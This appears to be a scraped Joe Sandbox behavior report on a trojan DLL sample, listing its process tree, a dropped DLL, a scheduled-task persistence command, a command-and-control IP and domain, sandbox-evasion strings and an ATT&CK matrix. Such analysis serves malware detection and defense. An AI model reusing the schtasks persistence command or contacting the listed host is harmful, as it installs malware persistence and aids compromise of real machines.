Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002CD50	9_2_000000018002CD50
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180070BE0	9_2_0000000180070BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180083D70	9_2_0000000180083D70
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CCE10	9_2_00000001800CCE10
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018000EE3F	9_2_000000018000EE3F
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180008E4F	9_2_0000000180008E4F
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180072F10	9_2_0000000180072F10
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180031F40	9_2_0000000180031F40
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180028F50	9_2_0000000180028F50
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180079F90	9_2_0000000180079F90
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CCFC0	9_2_00000001800CCFC0

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000007FEF2F87900 appears 47 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000007FEF2F2223B appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000007FEF2EE4A70 appears 39 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00000001800E4BE0 appears 58 times
Source: C:\Windows\System32\loaddll64.exe	Code function: String function: 000007FEF3054520 appears 39 times
Source: C:\Windows\System32\loaddll64.exe	Code function: String function: 000007FEF30FE240 appears 61 times
Source: C:\Windows\System32\loaddll64.exe	Code function: String function: 000007FEF307566C appears 47 times

Source: caseup.dll	ReversingLabs: Detection: 28%
Source: caseup.dll	Virustotal: Detection: 25%

Source: caseup.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\caseup.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {195B2CF0-9BCC-4145-91B3-37920C07B877} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Mutant created: \Sessions\1\BaseNamedObjects\ZLoad-Soft-Mutex M *

Source: classification engine

Classification label: mal80.troj.evad.winDLL@18/1@6/1

Source: C:\Windows\System32\loaddll64.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: caseup.dll

Static file information: File size 1453568 > 1048576

Source: caseup.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: caseup.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: caseup.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: caseup.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: caseup.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: caseup.dll	Static PE information: section name: _RDATA
Source: UimbTD.dll.5.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\rundll32.exe

File created: C:\ProgramData\StndUpdate\UimbTD.dll

Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

File created: C:\ProgramData\StndUpdate\UimbTD.dll

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49174

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\System32\loaddll64.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Windows\System32\taskeng.exe TID: 1696

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

API coverage: 9.6 %

Source: rundll32.exe, 00000009.00000002.1412198492.0000000000362000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ,fiddler.exe,vmware.exe,Virt
Source: rundll32.exe, 00000009.00000002.1412198492.0000000000362000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: API response successfully received,fiddler.exe,vmware.exe,Virt

Source: C:\Windows\System32\rundll32.exe

Code function: 9_2_000000018001C05A LoadLibraryA,PathFileExistsA,IsDebuggerPresent,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,

9_2_000000018001C05A

Source: C:\Windows\System32\loaddll64.exe

Code function: 1_2_000007FEF305A570 GetProcessHeap,HeapAlloc,

1_2_000007FEF305A570

Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30F1978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_000007FEF30F1978
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F7B208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_000007FEF2F7B208
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800D7870 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00000001800D7870

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 206.81.11.20 80			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: it-south-bridge.com

Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain	Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 1_2_000007FEF30F1380 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_000007FEF30F1380

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	111 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	12 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	3 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
caseup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report caseup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
caseup.exe